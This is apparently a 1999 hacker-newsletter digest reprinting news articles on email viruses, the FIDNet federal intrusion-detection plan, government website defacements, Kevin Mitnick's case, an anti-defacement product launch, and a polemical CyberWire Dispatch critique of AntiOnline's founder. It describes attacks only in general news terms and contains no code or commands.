The new virus is expected to be a variant of either Melissa or the Explore.Zip worm, both of which have cost businesses millions in recent weeks. Both Melissa and the Explore.Zip worm rely on people opening email attachments. Once into the computer the virus sends a message to everyone in the victim's in-box and then destroys every file written in Microsoft Word, Excel or Powerpoint, among others. New virus on the block One variant has already appeared. PrettyPark replicates itself by sending copies to everyone in the victim's address book. It waits silently until the victim is on the Internet, then sends lists of the victim's user names, password files and address lists to Internet Relay Chat channels. Anti-virus developers are expecting the next step to be a virus which roots around in your files and then posts your documents across the Internet. "The virus wouldn't be able to tell which of your documents are secret. It might just post your shopping list, or it could be a highly sensitive company document. "What's more, it would appear as if you sent it," says Graham Cluley of Sophos Anti-Virus. Several anti-virus makers already have an answer to PrettyPark. But they cannot build a defence against future variants until they encounter them. Java and ActiveX - next infection target It is predicted that the next generation of viral infections will hit small Webpage programmes called applets, written in Java and particularly ActiveX. A recent survey revealed that more than half of medium-sized organisations using an intranet had no security policy in place to respond to the threat of attacks on Java applets. Recent estimates indicate that Melissa, Explore.Zip and other malicious attacks have cost US business $7.6bn this year alone. 
@HWA

11.0 New York Times Debunked - FIDNet Moves Ahead as Planned
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ted
The Register has taken the time to actually read the draft proposal reported on last week by John Markoff of the New York Times. The draft proposal, now seven weeks old, calls for the creation of the Federal Intrusion Detection Network, or FIDNET. When the NYT reported on this story last week privacy advocates cried foul claiming that such a network would intrude on personal freedoms. Obviously a closer look at the document is warranted.

The Register
http://www.theregister.co.uk/990730-000022.html

Officials from the CIAO and NIPC and other groups have said that the recent media attention and public outcry over the proposed FIDNet will not prevent the plan from going forward.

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0802/fcw-newssecurityside-08-02-99.html

The Register;
Posted 30/07/99 7:31pm by Thomas Greene in Washington

US net snooping plans debunked

Terror spread across the Net on Thursday when New York Times correspondent John Markoff broke the Big Story: a National Security Council draft proposal will put the FBI in control of "a sophisticated software system to monitor activities on non-military Government networks, and a separate system to track networks used in crucial industries."

Ghastly.

The body to be created will be called the Federal Intrusion Detection Network, or FIDNET. Big Brother by another name, no doubt. Libertarian alarmists and conspiracy paranoiacs dropped their daily meds and rose angrily, if unsteadily, to arms.

"The plan...
specifies that the data [FIDNET] collects will be gathered at the National Infrastructure Protection Center (NIPC), an interagency task force housed at the Federal Bureau of Investigation," the Times went on, adding that "the plan strikes at the heart of a growing controversy over how to protect the nation's computer systems while also protecting civil liberties -- particularly since it would put a new and powerful tool into the hands of the FBI."

But it so happens that The Register has its own copy of the draft proposal, and unlike the New York Times, we've actually read ours. Let's just have a peek at the text.

The first observation we make is that the text states plainly, "the GSA (General Services Administration) is responsible for establishing the FIDNET Program Office: this includes creating an interagency management team from the defence, intelligence, technical, legal, and law-enforcement communities."

According to our reading, FBI's NIPC team will come in later, when FIDNET data gathered by the GSA suggest criminal activity. Again we take the unconventional approach of consulting the text: "FIDNET will provide raw/filtered data from network sensors and the Federal Computer Incident Response Capability. NIPC will continue to be responsible for further data processing."

We remain at a loss to explain why the NYT reported that FIDNET would "put a new and powerful tool into the hands of the FBI." On the contrary, it appears that the Bureau's NIPC will be a tool of the GSA, if and when it decides the government has been cracked.

Michael Vadis, FBI's Director of NIPC, made it clear during testimony to the Senate Y2K Committee yesterday that the FBI will respond only where there is evidence of a federal crime.

The only language we found in any way alarming was, "FIDNET will interface with the currently planned intrusion detection systems being developed for DOD (Department of Defence) and national security agencies."
We didn't quite know what the pseudo-verb "interface" was intended to mean, but we know that American law enforcement and the military are forbidden to do a great deal in the way of "interfacing". As the very existence of America's Act of Posse Comitatus indicates a history of some difficulty in distinguishing between civil and military purviews, this little snippet naturally raised our eyebrows. On this matter the Department of Justice computer crimes division declined to be helpful. The level of interdependence between military and non-military bodies being contemplated is indeed a controversial issue, but it seems unlikely that the final product will initiate military involvement in civilian affairs enough to invite a popular backlash. Elections are coming up, after all; and the FIDNET system will present itself as a tempting target for cyberterrorists if its management becomes odious, thereby having the ironic effect of decreasing security for government systems. Assuming that the language of the proposal does get tidied up a bit, we can expect a much softer line in reference to DOD's role in FIDNET. This still leaves the matter of DOD participation in case of an emergency. The president is permitted by law to suspend the Act of Posse Comitatus in difficult circumstances, such as insurrection, mayhem in the streets, foreign invasion, or those the Y2K rollover might possibly present. A further bit of constitutional intrigue will undoubtedly emerge if a foreign military organization should attack a US civilian network related to banking, energy, transportation or some other essential service. It does not necessarily follow that the DOD would need access to civilian networks in order to reply on behalf of the USA. Vadis for one thinks an organised attack is inevitable. 
He declined to go into specifics, but left us with the strong impression that hostile military bodies overseas are developing the means to disable military, government and civilian networks remotely via an internet-based attack. Clinton's National Security Advisor, Sandy Berger, said on Thursday that there exist "governments that we know are developing systems to get access to our computer systems." Not an especially comforting thought. "We know that, in fact... there have been intrusions into sensitive systems," Berger added. Whether or not such an attack is being planned, it is certain that the US government expects one. We wonder if the increased level of connection among government systems needed for FIDNET to monitor them effectively might not lead to increased vulnerability. Whether it happens, or when it happens, it is sure to be a jurisdictional nightmare; and the FIDNET proposal does foreshadow that confusion with its own vague language. A crucial point here is that the proposal leaked to us is in draft form and now seven weeks old. The Register's contact on the White House National Security Council, who goes by the name of "an administration official," made it clear that the final draft will not be ready for submission to the President until September at the earliest. The FIDNET document is at present quite fluid, and on its way past numerous reviewers including the Department of Justice computer crimes division, the General Services Administration, the Department of Defence, the National Security Council and the FBI. Furthermore, our source at NSC tells us, the proposal currently being circulated does address and tighten up the unfortunately vague "interface" language. The level of involvement between DOD and non-military government agencies is intended to be little more than an advisory relationship and a sharing of new quirks, bugs and attack techniques much as "one police department might share tips with another in a different jurisdiction." 
The language which led to an assumption by many that FIDNET might one day monitor private-sector networks is also being clarified. NSC says that there will not be even an opt-in programme for private users to voluntarily choose such monitoring. FIDNET will, however, share its tricks with private enterprise, and leave it to them to implement what it chooses, on its own nickel. The Register will report fully and eagerly on the specific changes to the FIDNET proposal as soon as the latest version is leaked. It might actually make sense to withhold judgment on the piece until after it's been reviewed and polished. Just a thought. ® -=- Federal Computer Week; AUGUST 2, 1999 Officials: Security plan on track In the face of privacy concerns, schedule remains unchanged BY DIANE FRANK (diane_frank@fcw.com) Despite public outcry and congressional interest, federal officials are sticking to their schedule for developing and releasing a plan to protect the federal information infrastructure from cyberattacks. Several stories in the media last week inaccurately reported that the draft of the National Plan for Information Systems Protection would put the FBI in charge of monitoring private-sector and government networks for cyberattacks through the Federal Intrusion Detection Network (Fidnet). This touched off protests from public-interest groups about citizens' privacy, and several members of Congress asked for a complete copy of the draft and a briefing in the next few weeks. Officials from the Critical Infrastructure Assurance Office (CIAO), the National Infrastructure Protection Center and other high-level federal groups involved in creating the plan said the attention to what is still an internal document under development will not change anything. "This will have no effect on the process," one senior National Security Council official said. 
"It is just now completing the second round of comments from the agencies and industry...and will be brought to the president in October."

Others stressed that the plan deals only with federal networks and that the privacy and civil rights of Americans are being taken into account at every step.

"An important element of the Fidnet program is a legal review by the Justice Department," said John Tritak, director of the CIAO. The plan also is being reviewed by the chief counselor for privacy at the Office of Management and Budget's Office of Information and Regulatory Affairs, and those reviews may change the current version of the plan, he said.

In fact, the first version of the plan has already been reviewed by the Office of the Assistant Attorney General, which determined it was completely legal, according to a senior DOJ official.

The plan is based on the critical infrastructure protection plans from agencies and industry required by Presidential Decision Directive 63 and originally was scheduled to be sent to Congress and the president this fall, Tritak said. It also includes programs for education and training of information security professionals, research and development of computer security profits, and the basis for revisions of current laws to "promote greater information sharing, enhance systems security, and strengthen protections for civil liberties and privacy."

Although members of Congress have known about the plan for some time, most did not realize its extent, and that is partly what touched off a request from Sen. Bob Bennett (R-Utah) to receive a copy of the plan, said a spokesman for the senator.
@HWA

12.0 Computer `crackers' set sights on .gov for chaos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by D----Y

http://www.businesstoday.com/techpages/hack08011999.htm

Computer `crackers' set sights on .gov for chaos
by Mark Mueller
Sunday, August 1, 1999

It was the kind of threat for which computer hackers are famous, a declaration of war dripping with the risk-free bravado so common on the anonymous Internet.

The warning, which appeared on a hacked Web page of the U.S. Interior Department in late May, promised unrelenting attacks against government computers to avenge an FBI roundup of hackers associated with the group Global Hell. Just weeks earlier, Global Hell had claimed responsibility for an attack on the White House's main Web page.

``Now, it's our turn to hit them where it hurts by going after every computer on the Net with a .gov,'' the message read. ``We'll keep hitting them until they get down on their knees and beg.''

That the threat was made - risking the pique of the FBI - isn't as surprising as the follow-through.

In recent months, hackers, or crackers, as bad-guy hackers are known, have indeed blazed through a wide swath of government and university computers, defacing some Web sites and shutting down others.

Among the high-profile targets: the U.S. Senate (twice), the Army, the Navy and the Departments of Agriculture, Labor and the Interior. Computer systems also were hit at Georgetown University, the University of Colorado, the University of Michigan and Harvard University.

The most brazen of the attacks targeted the lion's den itself: the FBI Web page, which was out of service for nearly a week as programmers beefed up security on the site.

Jim Settle, former chief of the FBI's computer crimes squad and now an Internet security consultant, calls the FBI strike ``an out-and-out declaration of electronic warfare.''

For some, it's a war that can't afford to be lost.
The feeble network that once was the domain of a few scientists is now a robust and far-reaching behemoth that caters to hundreds of millions of people, some of whom pay their taxes, buy goods and send intensely personal information through their computers. In the wrong hands, such information could prove embarrassing or costly. Seen in its most sinister light, computer intrusion is a threat to national security. But the self-proclaimed ``warriors'' who carried out the recent attacks against government Web sites hardly sound like cyberspace shock troops. Their loose-knit groups bear names like the ``Keebler Elves,'' the ``Masters of Downloading'' and ``Hacking for Girlies.'' When they hack sites, they traditionally leave behind inane scrawlings - ``Boo! Did we scare you?'' - and ``shout-outs'' to their friends. Those familiar with the hacking subculture say such groups are generally composed of teens - and occasionally people in their early 20s - with a lot of computer equipment and too much time on their hands. ``These are just immature kids doing this from their home computers,'' said John Vranesevich, founder of Anti-Online, a group that tracks hacker activity and that has compiled dossiers on 6,000 hackers. ``It's a game to them. They make a move, and they can't contemplate how it affects people in the real world. It's not reality until the FBI bangs on their door.'' Vranesevich called the recent wave of attacks a ``temper tantrum'' over the May FBI raids, in which agents confiscated computer equipment and questioned teens in 11 cities, including Houston, Seattle and San Diego. A spokeswoman for the FBI in Boston said the New England office was not involved in the operation. Those who deface Web sites - about 1,300 sites have been defaced so far this year, according to the most reliable statistics - justify their actions by arguing they're actually doing companies and organizations a service by pointing out security deficiencies. 
But law enforcement authorities and others who deal with hackers dismiss the argument. ``I don't buy it,'' said Drew Williams, the founder of an AXENT Technologies' SWAT team to deal with hacker attacks. ``Any hacker group that has not been invited to test security is committing a crime.'' That assessment is shared by David Green, deputy chief of the computer crimes and intellectual property section at the Justice Department. ``This is not just electronic graffiti,'' Green said. ``They're shutting down access to Web sites, sometimes for hours, sometimes for days, and it makes it impossible for people who want access to that Web source to get it.'' Moreover, there's far more at risk than down time for Web servers, contends Peter Mell, who conducts hacker research for the National Institute of Standards and Technology, a division of the U.S. Commerce Department. ``Real harm can be done,'' Mell said. ``A lot of people download their tax forms from the IRS today. What if someone broke into the IRS Web server and changed just a single number? It would cause supreme chaos.'' Mell also pointed to electronic banking and stock trading, saying Web servers today handle increasing amounts of sensitive information. ``This isn't child's play anymore,'' he said. ``I pay my bills online. I trade stocks online. In that kind of environment, I can't afford people breaking into computers.'' The FBI heartily agrees, though it has not characterized its crackdown on hackers in quite the grandiose terms that hackers do. ``We don't have a war against hackers. We're following our mandate, which is to investigate violations of federal law,'' said Bill Carter, a spokesman for the FBI's headquarters in Washington. ``The fact that these hackers or hacker groups have their noses out of joint over this, we can't help that.'' Most hackers are not caught, but the recent raids suggest the FBI is starting to get better at tracking them. 
The agency has about 500 open computer crimes cases at any given time. But the federal agents' methods - charging in with warrants and bulletproof vests - worries some in the hacking community. ``For those of us in the scene for a number of years, it's starting to get scary only because we worry it's going to turn into a witch hunt,'' said Space Rogue, a member of the Boston-area group L0pht Heavy Industries, a former hacker clan that now bills itself as an electronic think tank. ``While defacements will probably continue no matter what law enforcement officials do, it would be very easy for the government to just start executing search warrants left and right, seizing computers and scaring people half to death.'' Internet watchdogs - and some hackers themselves - say that while the crackdown should continue, the real issue is computer security. Space Rogue argues that nearly all Web page defacements are carried out with known security flaws in software. As an example, he said, his group e-mailed the Army's webmaster about a flaw in its ColdFusion server software a month before someone used the hole to hack into the Army's Web site. ``It comes down to the person in charge of the machine and whether they're taking their security seriously,'' Space Rogue said. ``This sort of thing never should have happened in the first place.'' Settle, the former FBI computer crimes chief, says the danger will be far greater when those doing the hacking aren't teens out for kicks but terrorists intent on electronic warfare. ``Our computer systems today are like cars operating without safety equipment: no headlights, no bumpers, no airbags, no roofs,'' he said. ``Heck, if teenagers can do this, what can sophisticated intelligence operatives do? This is just a taste of things to come.'' The government acknowledges as much. 
In testimony before a congressional panel, government security experts said government computers are easy marks because employees lack training, because well-trained staff flee for the bigger paycheck of the private sector and because internal security procedures often aren't followed. ``Most federal agencies continue to lack the ability to detect against and recover from cyber attacks,'' U.S. Rep. Connie Morella (R-Md.), chair of the House Science Subcommittee on Technology, said at the June 23 hearing. To combat the deficiency, the Clinton administration last week proposed spending $1.5 billion in the next fiscal year on a sophisticated intruder warning system that would be installed on military, government and private-sector computer networks by 2003. Operating something like a burglar alarm, the system would detect break-ins, funneling that information to a central location. ``A concerted attack on the computers of any one of our key economic sectors or governmental agencies could have catastrophic effects,'' Clinton wrote in a draft cover letter accompanying the proposal. Civil libertarians and Internet privacy watchdogs already have protested the plan, saying it will give the government unprecedented surveillance powers, equipping authorities with the tools to peruse the private dispatches of the masses. House Majority Leader Dick Armey (R-Texas) joined in the criticism, deriding the plan as an opportunity for ``government peeping toms.'' No matter the government response, hackers will, no doubt, continue mounting challenges, probing for deficiencies in networks and deriding those who chase them. ``You can stop one, but you can not stop all,'' hackers wrote when they defaced the U.S. Senate Web page for the second time in late June. 
A more recent defacement of an obscure Venezuelan Web page repeated the theme, carrying a ``call to arms'' imploring competing hacker groups to unite to ``win this war.''

``Remember, this is our world, not the government's,'' the page read.

Time will tell.

Prosecuted `cracker' a martyr to techies

In hacker circles, he is a modern-day martyr, a technological tinkerer whose attacks on other people's computers amounted to harmless exploration before the FBI swooped down on him, dubbing him Online Enemy No. 1.

To prosecutors and to judges, he is a dangerous miscreant whose ability to crack computer systems and whose propensity for running from the law required that he be held without bail.

Kevin Mitnick, for four years the cause celebre of the Internet's dark side, could soon be going free.

Mitnick, 35, who pleaded guilty in March to multiple counts of computer and wire fraud for breaking into systems and stealing software from such companies as Sun Microsystems, Novell, Motorola and Nokia, will be sentenced Aug. 9 under a plea agreement that could, with good behavior credits, allow him to leave federal prison within weeks.

``Kevin is optimistic that this case will be over and that he can get on with his life,'' said Mitnick's lawyer, Donald C. Randolph of Santa Monica, Calif.

But even if Mitnick himself fades into obscurity, his cause is unlikely to follow. In the hacking community, Mitnick long ago became a symbol of what hackers term gross government over-reaction, a theme repeatedly hammered home by Randolph.

``The government prosecution of Mr. Mitnick was to carry out an agenda launched by them in the 1990s,'' Randolph said. ``The government wanted to demonstrate they were going to be tough on computer terrorism. Unfortunately, the government did not have a bonafide computer terrorist to prosecute, so they went after Mr.
Mitnick, a recreational hacker who was arrested with a big splash and who became a convenient target.'' Randolph's comments could be dismissed as the arguments of a defense lawyer looking to gain sympathy for his client, but he's not the only one making them. Drew Williams, who founded Axent Technologies' SWAT team to respond to hacking incidents for clients, said the government miscalculated with Mitnick. ``I am not a Mitnick supporter at all. However, I think the government did in fact set out to make an example and instead made a martyr,'' Williams said. ``An individual's rights to due process probably got a little trampled.'' Denied bail on charges that could have initially landed him in jail for a century, Mitnick appealed all the way to the U.S. Supreme Court, where the justices declined to hear his lawyer's argument that bail should be set. Hackers have seized on the bail issue, leaving ``Free Kevin'' messages on the Web sites they hack. Recent examples include the home pages of the U.S. Senate and Greenpeace, where hackers left the tongue-in-cheek message ``Free Mitnick or we will club 600 baby seals.'' There is also a ``Free Kevin'' Web site (www.freekevin.com) that gives Mitnick updates and carries a confinement clock showing - to the second - how long Mitnick has been jailed. Randolph argues that while people should be prosecuted for breaking into systems, the law needs to be refined to distinguish between recreational hackers and information terrorists. ``I do not quarrel at all with the government's right to prosecute computer fraud and to go after computer terrorists, but it's high time they distinguish between high crimes and misdemeanors so they're not trumpeting the arrest of the century when the suspect is a kid on a laptop,'' Randolph said. Mitnick's prosecutors insist they have not overreached, that Mitnick caused millions in damage by stealing and changing information in computer systems. 
``This is someone whose conduct over a 2-year period was very broad and very serious,'' Assistant U.S. Attorney Christopher Painter said. ``He hit a huge number of companies with a lot of damage. He is not the victim.''

If Mitnick does win his freedom soon, it could be short-lived. The Los Angeles County District Attorney's Office is preparing its own case against him on charges similar to the federal claim.

Randolph said he's confident Mitnick, in the end, will prevail.

``In 1995, the press and the public were fooled into thinking Kevin Mitnick was this cyber bogeyman,'' he said. ``That type of argument doesn't fly in 1999. People know better.''

Sites that have been targeted

Here's a partial list of Web sites that have been attacked in recent months. In most cases, the sites were defaced. In others, a flood of requests for service overwhelmed Web servers, rendering them unusable. In several of the attacks, the intruders called the acts revenge for FBI ``harassment'' of hackers.

Bell South
eBay (on-line auctioneer)
FBI
Fort Monmouth (N.J.) U.S. Army Garrison
Georgetown University
Harvard University
Idaho National Engineering and Environmental Laboratory (conducts research for the U.S. Department of Energy)
Illinois Comptroller's Office
NASA Goddard Space Flight Center
National Oceanic and Atmospheric Administration Storm Prediction Center
State of Virginia home page
University of California-Davis
University of Colorado
University of Michigan
University of Wisconsin
U.S. Army main Web site
U.S. Coast Guard
U.S. Department of Agriculture
U.S. Department of Education
U.S. Department of the Interior
U.S. Department of Labor
U.S. Information Agency
U.S. Navy
U.S. Senate (twice)
The White House

@HWA

13.0 IIS Server 'hackproof'?
     ~~~~~~~~~~~~~~~~~~~~~~~

contributed by Code Kid

A small company in Sydney Australia, called Creative Digital Technology, has claimed to have created software that will make web pages on IIS Servers 'hack proof'.
The software, known as SecurePage, digitally signs all pages and then compares those signatures against encrypted master copies. If the signature changes then the web server will stop serving the page. They have issued a challenge to get people to try and break the system, however, the information on the challenge is difficult to find.

The Australian
http://technology.news.com.au/techno/4108922.htm

Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_174011,00.html

Creative Digital Technology
http://www.creative.com.au/

Developer issues hacker challenge
By JENNIFER FORESHEW
3aug99

A SMALL Sydney company that has developed software designed to make Web sites hack-proof, has thrown out a challenge to crack the technology.

Creative Digital Technology (CDT) has developed software which, when downloaded, makes a site secure.

"We are prepared to stand behind that financially by offering a prize to universities to see if they can do what our developers haven't been able to do," CDT chief operating officer Philip Burton said.

CDT, which developed the country's first SET (Secure Electronic Transaction) enabled products, is launching the SecurePage product at Internet World 99 this week.

"We can protect any Web site," CDT chief executive Bahram Boutorabi said. "The first version of the product runs on Microsoft's Internet Information Server platform, but we are planning to roll out across all platforms."

Mr Boutorabi, who is also technology officer, said many sites could be hacked because they were developed using mostly straight text.

"We have developed the technology to put something into Active Server Pages, HTML, Net Commerce Mark-up Language and XML, which represents a signature that someone has made against that page," Mr Boutorabi said.

Any attempt to alter a Web site's content would result in action being taken by the system, which is protected by 192-bit, Triple-DES encryption.
"If the contents of that page have been altered for any reason it will stop serving that content out and serve it from its own content area, where everything is fully encrypted," Mr Boutorabi said.

"SecurePage enables an administrator to put a disc into the system, run the administration and tell it to sign all of the pages with their password.

"To alter the code or text, you have to have administrative access to change the content or to stop the system."

Mr Burton, who is also a senior partner in CDT, said the company began working on the technology after attacks on high-profile Web sites.

"This came about from evidence that significant Web sites were being hacked and destroyed.

"We believed we could deliver a protection device in software form that could be downloaded from our Web site by whoever was hosting that particular site."

CDT declined to reveal further details of the technology pending approval of a patent on SecurePage.

If you decide to take up CDT's challenge to crack its software, Computers & High Technology wants to know. E-mail us at auscomp@ozemail.com.au – but only if you are successful.

Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_174011,00.html

Australian Web Innovations Debut at IW Sydney
August 4, 1999
By Gerard Knapp
InternetNews.com Australian Correspondent
International News Archives

[Sydney, AUSTRALIA] Several Australian companies have used the Internet World Australia 99 exhibition to launch new products.

Sydney-based startup Pure Commerce has introduced Pure Global Pay, a payment gateway service which can accept 32 different currencies without merchants needing to establish relationships with non-Australian banks.

E-commerce developer Creative Digital Technology is debuting two software applications: a wallet which supports the Secure Electronic Transactions (SET) standard for e-commerce transactions called ActiveWallet, and a solution for attempts by hackers to deface corporate Web sites called SecurePage.
The ActiveWallet client is an 850KB client-side applet which enables consumers to pay bills and buy products using credit cards in a drag and drop environment. The client is designed to support transactions using the SET-certified merchant server technology of US-based GlobeSet.

SecurePage attaches digital signatures to static Web pages and dynamically generated components so that they can be compared against an encrypted master version to check if they have been altered by malicious hackers.

Allaire has also used Internet World as its Australian launch for Spectra, its Web content management product.

The show has also coincided with the announcement that US-based analyst firm Jupiter Communications had filed preliminary documents for an IPO. Wednesday keynote speaker Gene De Rose, who is CEO and 21.8 per cent stake holder of Jupiter, is poised to become the next Internet multi-millionaire.

The Internet World 99 Best of Show product awards, judged by journalists at Internet World Australia magazine, will be announced on Wednesday.

14.0 Latest CWD Pokes at AntiOnline
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

The CyberWire Dispatch, a mailing list newsletter, has some very interesting things to say about John Vranesevich and AntiOnline. CWD writer Lewis Z. Koch makes some powerful observations about his past dealings with and the writings of Mr. Vranesevich. (If you have been following the antics of AntiOnline at all this is a must read piece.)

CyberWire Dispatch- republished with permission

Note: CyberWire Dispatch is a mailing list only newsletter. It is reprinted here with permission. Subscription information is at the end.

CyberWire Dispatch // August 1999 // All Rights Reserved

Jacking in from the "Pine-Sol" port:

By Lewis Z.
Koch CWD Special Correspondent

Twenty-year-old John Vranesevich calls his AntiOnline Web site "a valuable tool in the fight against 'CyberCrime'". In a call to arms, this self-anointed, junior G-man wannabe, promises to uncover, reveal and inform on hackers and other miscreants.

Out of this misguided cyber-vigilantism, arises the "denunciator" virus, which reaches its full lethality in totalitarian states but also finds a home in democratic societies as well, usually in climates of social resentment, political fanaticism, or, my personal favorite, political self-righteousness.

The Denunciator virus, known also as the "Accuser" virus, destroys careers, leaves permanent scars, called "blacklists," gives rise to false alarms, warnings or contrived "cautionary tales" meant to lull or divert citizens. The natural host for this virus is believed to be a species of the rodent called a "snitch," aka squealer, stool pigeon, informer; rat bastard.

Every delusional crusader needs a mission statement; Vranesevich is no different. This self-anointed sheriff-of-cyberspace pens this Uber-warning to hackers:

"I know that some of you are playing what you feel is a game. A game that you think you are winning. Some of you sit back and laugh at organizations like the FBI. You make sure that you provide enough information to make it obvious who you are, yet are careful not to provide enough information to actually have it proven. I have been watching you these past 5 years. I know how you do the things you do, why you do the things you do, and I know who you are."

And if you're keeping score-and you should be-you'll note that Vranesevich apparently started down this crusader road at the tender age of 15 or just about the time he figured his Johnson could be used for more than simple utilitarian bodily functions.
This not-very subtle paean to cyber-vigilantism could easily be dismissed save for the fact that Vranesevich has earned a demi-celebrity status from journalists working for publications from which we have come to expect more judicious sourcing, including, but not limited to, Matt Richtel of The New York Times, John Schwartz of The Washington Post and even, sadly, CWD's own Brock Meeks while cloaked in his alter-ego as Washington correspondent for MSNBC.

And we wonder why fewer and fewer people trust the media.

Hung With His Own Rope
=====================

In his mission statement Vranesevich unequivocally states, "I've seen myself talking with people who have broken into hundreds of governmental servers, stolen sensitive data from military sites, broken into atomic research centers."

Question is, can we believe him?

There's his rather perplexing story about hackers breaking into an "Israeli" atomic research center. At first, as Vranesevich tells it, when hackers told him what they had done, he "freaked" even thought the boast might be "far fetched." But these hackers sent him a "folder full of documents written in a foreign language" they claimed they had copied from the "B'Hadvah" Atomic Research Center. [Note: Vranesevich didn't know how to spell the name of the so-called research center].

"Were the documents in Hebrew or English?" I asked.

"Bengali."

When he broke the "story" on his AntiOnline web site, all media hell broke loose. "Every mainstream media started calling and questioning and calling the research center," Vranesevich said. "I had all these nuclear arms proliferation people calling. Here I am in my parent's living room, and one day, thirteen calls from anti-nuclear proliferation and pro-nuclear proliferation (sic) groups wanting to know - is this significant, what is Israel doing?"

I was still having a problem with the "Bengali" aspect to the documents.

"Ah, John," I asked, "is this an Israeli research center or could it be Indian? Pakistani?"
Silence. Then Vranesevich said, "I think it's Indian. Who was the one that just did the nuclear testing?" "That was India and Pakistan, not Israel." "Oh, then this was India, not Israel." Oh. Then there's his story about changing medical records-pretty serious stuff. Can we take him at his word there? "[I]'ve seen people change the medical records of individuals in our armed services" Vranesevich asserts in his "mission" statement. When asked about these nefarious deeds, Vranesevich works himself up into a high dudgeon about hackers breaking into sites and changing medical records. "What would have happened if medical records had been changed and a cancer patient received the wrong treatment for it?...What if I had looked into who these [hacker] guys were, a little further? What would have happened if I would have published the story? What would have happened if CERT had come out and said medical records had been changed and a cancer patient received the wrong treatment because of it!" I questioned him closely. "You really saw people change the medical records of individuals in our armed forces?" "I don't mean that literally," backtracking as fast as his voice could carry him. "You see the language I was using? I don't mean literally 'I saw them do it, I saw it happen.' It's something that transgressed (sic) before. It's like we saw our country go through three wars. It doesn't mean I caused (sic) the three wars. You see what I'm saying? Or I've seen crime happen over and over again in my neighborhood. Doesn't mean I literally saw it. You know what I mean? I don't know if I'm making myself clear." Ah, er.. right. He gave it one more chance. "Looking back in retrospect (sic). It was like actions that transgressed (sic) before. I've sort of watched the events transfold (sic) before my eyes." Yep, that clears it up; someone get this guy an English tutor...There's more like that but after a while it gets, well, boring. 
Vranesevich also claims a "semi-contractual" relationship with all kinds of official military and police types, including one with the NASA and one with the Defense Information Systems Agency (DISA). Can we believe him?

NASA says no. After checking with their databases "they could find no record of NASA having done business with Mr. Vranesevich or his company AntiOnline," reports Patricia M. Riep-Dice, NASA Freedom of Information Act Officer.

According to a DISA spokesman, no such relationship exists. None. Nada.

In Other People's Words
=======================

In his grasp for distinction, celebrityhood, acclaim, Vranesevich overreaches, as he did with his claim of unethical behavior on the part of computer security expert Marcus Ranum.

Ranum's "crime"? "Guilt-by-association" with two hacker groups, L0pht Heavy Industries and cult of the Dead cow (cDc).

L0pht Heavy Industries is among the finest Microsoft error-catchers in the world; it is a company with employees and it pays taxes. "cult of the Dead cow" is a group of hackers in the tradition of Yippie founders Abbie "Steal This Book" Hoffman and Jerry Rubin. The cDc promises Internet chaos, anarchy and terror; in 1968, in Chicago, Abbie Hoffman and Jerry Rubin threatened to pour LSD in the water and send Yippie studs to O'Hare airport to seduce the wives of delegates to the Democratic National Convention. If that analogy is lost on you, cut your losses now, stop reading and return to your "Internet for Dummies" workbook.

L0pht and cDc tend to despise Microsoft, but then so do a lot of people, including folks in the Justice Department. More than likely there is cross-over contact between L0pht and cDc since the two have much in common, in the same way journalists from different newspapers and television tend to hang out at the same bars, buy each other drinks and complain about stupidity and venality of their editors.
cDc had been tinkering around the multiplicity of holes, vulnerabilities and general screw ups in the Microsoft Windows operating system. They developed a back-dooring program for Win 95, one that allowed a Trojan Horse to exploit that vulnerability. In a stroke of genius that would make a Wizard of Madison Avenue green with envy, they dubbed the program "Back Orifice."

Ranum developed a program to counteract Back Orifice and called it "Back Officer Friendly."

Vranesevich claims he was "shocked, shocked" to discover that Ranum might have had conversations with hackers at L0pht, perhaps even some at cDc about Back Officer Friendly. Vranesevich's story alleged that Ranum could have even been talking with the very people at cDc who developed the exploit in the first place.

So what do we have here? Collusion? Duplicity? Ethical lapse? Double-agentry?

Whom to believe?
================

Bell Labs' William R. Cheswick, co-author with Steven Bellovin of the exemplary "Firewalls and Internet Security - Repelling the Wily Hacker," says of Ranum: "I have worked with Marcus for years. He is a strong force for Good against Evil. A security person is paid to think bad thoughts, and Marcus is quite good at it. The key is that he doesn't do the bad stuff, but uses this approach to make things safer."

Bellovin, himself a world-class computer expert, certainly doesn't equivocate. Ranum has "been a strong, positive force for Internet security, both in the sense of building useful tools and in the sense of teaching other people important principles. I've also never heard any serious question about his ethics."

"Marcus has one of the most fluent understandings of Internet security I have ever seen," says Bruce Schneier, whose books on encryption and on privacy can trigger a physical and intellectual hernia, "his ability to see threats and attacks, defenses and countermeasures, makes him one of the most valuable resources we have in computer security world," Schneier said.
Marcus' "association with the L0pht recognizes that there is considerable expertise in the hacking community that can be leveraged in the fight against computer crime. Marcus is just smarter than other people, because he realized it and figured out how to use it. No kidding; he's that good."

So you do the math: self appointed cybervigilante John Vranesevich, with his stolen "Israeli" atomic secrets written in Bengali, changed medical records that weren't changed, unsubstantiated relationships with NASA and DISA (and that's just for openers), and, on the other hand, Marcus Ranum and people like Cheswick, Bellovin, and Schneier.

The best way to deal with "Denunciator" virus is simply silence; don't feed the hype.

========================================

EDITOR'S NOTE: CyberWire Dispatch, with an Internet circulation estimated at more than [500,000], is now developing plans for a once-a-week e-mail publication. Every week, one of five well-known investigative reporters will file for CWD. If you think your company or organization would be interested in more information about establishing a sponsorship relationship with CyberWire Dispatch, please contact Lewis Z. Koch at lzkoch@wwa.com.

===================

To subscribe to CWD, send a message to:

Majordomo@vorlon.mit.edu

No subject needed. In the first line of the message put:

Subscribe CWD

To remove yourself from this list, send a message to:

Majordomo@vorlon.mit.edu

No subject needed. In the first line of the message put:

Unsubscribe CWD

----

@HWA

15.0 High Profile Sites Defaced
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by TurTleX

The Jerry Springer Show, Symantec Corporation and even Nellis Air Force Base have all had their pages defaced in recent days. The defaced Symantec page claimed to have left a trojan/worm behind that infected all of Symantec's systems. Symantec denies the charge. Thanks to attrition.org we were able to grab mirrors of the affected sites.
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html

BBC
